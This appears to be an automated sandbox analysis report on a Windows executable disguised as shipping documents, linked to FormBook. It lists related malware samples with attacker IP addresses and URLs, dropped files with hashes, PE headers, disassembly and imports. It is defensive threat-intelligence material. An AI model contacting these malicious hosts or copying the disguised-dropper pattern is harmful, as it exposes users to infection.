                                                                                  [EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.emlGet hashmaliciousUnknownBrowse
                                                                                  • 46.137.111.148
                                                                                  MULTIBAND-NEWHOPEUSNieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.64.187
                                                                                  CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.79.40
                                                                                  ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.79.41
                                                                                  PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.107
                                                                                  Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.108
                                                                                  SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.64.190
                                                                                  DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.107
                                                                                  SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.107
                                                                                  UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.107
                                                                                  Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.77.109
                                                                                  WIIUSarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 173.208.191.42
                                                                                  mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 69.197.135.107
                                                                                  loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 69.197.241.147
                                                                                  nabppc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 173.208.211.170
                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 173.208.128.129
                                                                                  la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                  • 204.12.226.228
                                                                                  m68k.elfGet hashmaliciousMiraiBrowse
                                                                                  • 173.208.146.198
                                                                                  http://pub-21beea42d44e4f0e83b5336b9ac3900a.r2.dev/woosf.htmlGet hashmaliciousUnknownBrowse
                                                                                  • 173.208.194.98
                                                                                  ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                                                                                  • 173.208.146.179
                                                                                  https://is.gd/by2jssGet hashmaliciousUnknownBrowse
                                                                                  • 173.208.194.98
                                                                                  CONTABODEPO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.142.144
                                                                                  MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.142.144
                                                                                  Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.168.245
                                                                                  lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.168.245
                                                                                  New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.168.245
                                                                                  UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.168.245
                                                                                  sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                  • 167.86.111.146
                                                                                  PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.168.245
                                                                                  Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.168.245
                                                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                  • 161.97.142.144

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\B201338

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\waitfor.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\aut84AE.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):288256
                                                                                  Entropy (8bit):7.9957419363014886
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:AGAFHZFi8WDZgc9kRNu4+qKQLK97cCtIh5aUlIl7um5c5vD1EzlSj9:AGkFD2ucOuWKQ297btIJIIy9zlc9
                                                                                  MD5:6FA2AC7A13121F3B6517216B5966661E
                                                                                  SHA1:B46A0B4640B0FDBE5B9C4093645F8B1EB1746215
                                                                                  SHA-256:91C2D0FB0BD96D071AC233F5C9F8ACE16E7562D0A0D6FD734D3BCBEED83ECF10
                                                                                  SHA-512:AC61235AFCAA844B21FA31C892D1CF8A8BAAF757DE723BCB580C58F5AD9DB4ACC7738D5447C1FD08AEA8B4A6893FF71724671C3DFBEDA3C70BD84139A0D3B235
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...W3YX63VVQ..U2.8LDBAJE.U31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW.YX69I._U.\.`.M..`.- &.A754%Q4xUV88>!d7WaJ9*b($e..`.(572.TU<.VVQUDU289E..!-.t5T.x:4.*....61.O...}X+.X..u5T..30?.9?.7VVQUDU2.}LD.@KEp..mEZSW0YX6.VTP^E^2AlHDBAJEIU31UOSW0IX67&RQUD.2A(LDBCJEOU31EZSW6YX67VVQU4Q2A:LDBAJEKUs.EZCW0IX67VFQUTU2A8LDRAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQ{00J58LD..NEIE31E.WW0IX67VVQUDU2A8LDbAJ%IU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LD

                                                                                  C:\Users\user\AppData\Local\Temp\disturb

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):288256
                                                                                  Entropy (8bit):7.9957419363014886
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:AGAFHZFi8WDZgc9kRNu4+qKQLK97cCtIh5aUlIl7um5c5vD1EzlSj9:AGkFD2ucOuWKQ297btIJIIy9zlc9
                                                                                  MD5:6FA2AC7A13121F3B6517216B5966661E
                                                                                  SHA1:B46A0B4640B0FDBE5B9C4093645F8B1EB1746215
                                                                                  SHA-256:91C2D0FB0BD96D071AC233F5C9F8ACE16E7562D0A0D6FD734D3BCBEED83ECF10
                                                                                  SHA-512:AC61235AFCAA844B21FA31C892D1CF8A8BAAF757DE723BCB580C58F5AD9DB4ACC7738D5447C1FD08AEA8B4A6893FF71724671C3DFBEDA3C70BD84139A0D3B235
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...W3YX63VVQ..U2.8LDBAJE.U31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW.YX69I._U.\.`.M..`.- &.A754%Q4xUV88>!d7WaJ9*b($e..`.(572.TU<.VVQUDU289E..!-.t5T.x:4.*....61.O...}X+.X..u5T..30?.9?.7VVQUDU2.}LD.@KEp..mEZSW0YX6.VTP^E^2AlHDBAJEIU31UOSW0IX67&RQUD.2A(LDBCJEOU31EZSW6YX67VVQU4Q2A:LDBAJEKUs.EZCW0IX67VFQUTU2A8LDRAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQ{00J58LD..NEIE31E.WW0IX67VVQUDU2A8LDbAJ%IU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LD

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.169434051549643
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:SHIPPING DOCUMENTS_PDF.exe
                                                                                  File size:1'188'352 bytes
                                                                                  MD5:8a85446ebb8eb07a56672afa7c1b7fbc
                                                                                  SHA1:bc089650b78a7ebd5210ab0ae9609df50497a9d3
                                                                                  SHA256:dfd126e677ab29f2de7b5305b3fcf75d096f2a1f69f79b6513136be7965f73f7
                                                                                  SHA512:0b09313a0b5933726705c149d058ca98012b57aac38409eea3cae7764dbe3ccd50f9266909465b8f715874e02f655e9774191fd5de01585614f2f2b98289cc25
                                                                                  SSDEEP:24576:Fu6J33O0c+JY5UZ+XC0kGso6FaC9TRjarp5BR/+NdWY:Hu0c++OCvkGs9FaCatZhY
                                                                                  TLSH:B745BF2273DDC360CB769173BF6AB7016EBF78610630B85B2F980D7DA950161262D7A3
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                  File Icon

                                                                                  Icon Hash:aaf3e3e3938382a0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x427dcd
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x675781BC [Mon Dec 9 23:48:12 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007F6E0C90CF3Ah
                                                                                  jmp 00007F6E0C8FFD04h
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  push edi
                                                                                  push esi
                                                                                  mov esi, dword ptr [esp+10h]
                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                  mov eax, ecx
                                                                                  mov edx, ecx
                                                                                  add eax, esi
                                                                                  cmp edi, esi
                                                                                  jbe 00007F6E0C8FFE8Ah
                                                                                  cmp edi, eax
                                                                                  jc 00007F6E0C9001EEh
                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                  jnc 00007F6E0C8FFE89h
                                                                                  rep movsb
                                                                                  jmp 00007F6E0C90019Ch
                                                                                  cmp ecx, 00000080h
                                                                                  jc 00007F6E0C900054h
                                                                                  mov eax, edi
                                                                                  xor eax, esi
                                                                                  test eax, 0000000Fh
                                                                                  jne 00007F6E0C8FFE90h
                                                                                  bt dword ptr [004BE324h], 01h
                                                                                  jc 00007F6E0C900360h
                                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                                  jnc 00007F6E0C90002Dh
                                                                                  test edi, 00000003h
                                                                                  jne 00007F6E0C90003Eh
                                                                                  test esi, 00000003h
                                                                                  jne 00007F6E0C90001Dh
                                                                                  bt edi, 02h
                                                                                  jnc 00007F6E0C8FFE8Fh
                                                                                  mov eax, dword ptr [esi]
                                                                                  sub ecx, 04h
                                                                                  lea esi, dword ptr [esi+04h]
                                                                                  mov dword ptr [edi], eax
                                                                                  lea edi, dword ptr [edi+04h]
                                                                                  bt edi, 03h
                                                                                  jnc 00007F6E0C8FFE93h
                                                                                  movq xmm1, qword ptr [esi]
                                                                                  sub ecx, 08h
                                                                                  lea esi, dword ptr [esi+08h]
                                                                                  movq qword ptr [edi], xmm1
                                                                                  lea edi, dword ptr [edi+08h]
                                                                                  test esi, 00000007h
                                                                                  je 00007F6E0C8FFEE5h
                                                                                  bt esi, 03h
                                                                                  jnc 00007F6E0C8FFF38h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [ASM] VS2013 build 21005
                                                                                  • [ C ] VS2013 build 21005
                                                                                  • [C++] VS2013 build 21005
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                  • [RES] VS2013 build 21005
                                                                                  • [LNK] VS2013 UPD4 build 31101

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x59904.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1210000x711c.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0xc70000x599040x59a005d794f0e03a658608a582d24580c833bFalse0.9266556616108786data7.892073146572697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x1210000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                  RT_RCDATA0xcf7b80x50bc9data1.0003356546929667
                                                                                  RT_GROUP_ICON0x1203840x76dataEnglishGreat Britain0.6610169491525424
                                                                                  RT_GROUP_ICON0x1203fc0x14dataEnglishGreat Britain1.25
                                                                                  RT_GROUP_ICON0x1204100x14dataEnglishGreat Britain1.15
                                                                                  RT_GROUP_ICON0x1204240x14dataEnglishGreat Britain1.25
                                                                                  RT_VERSION0x1204380xdcdataEnglishGreat Britain0.6181818181818182
                                                                                  RT_MANIFEST0x1205140x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                  Imports

                                                                                  DLLImport
                                                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                  UxTheme.dllIsThemeActive
                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
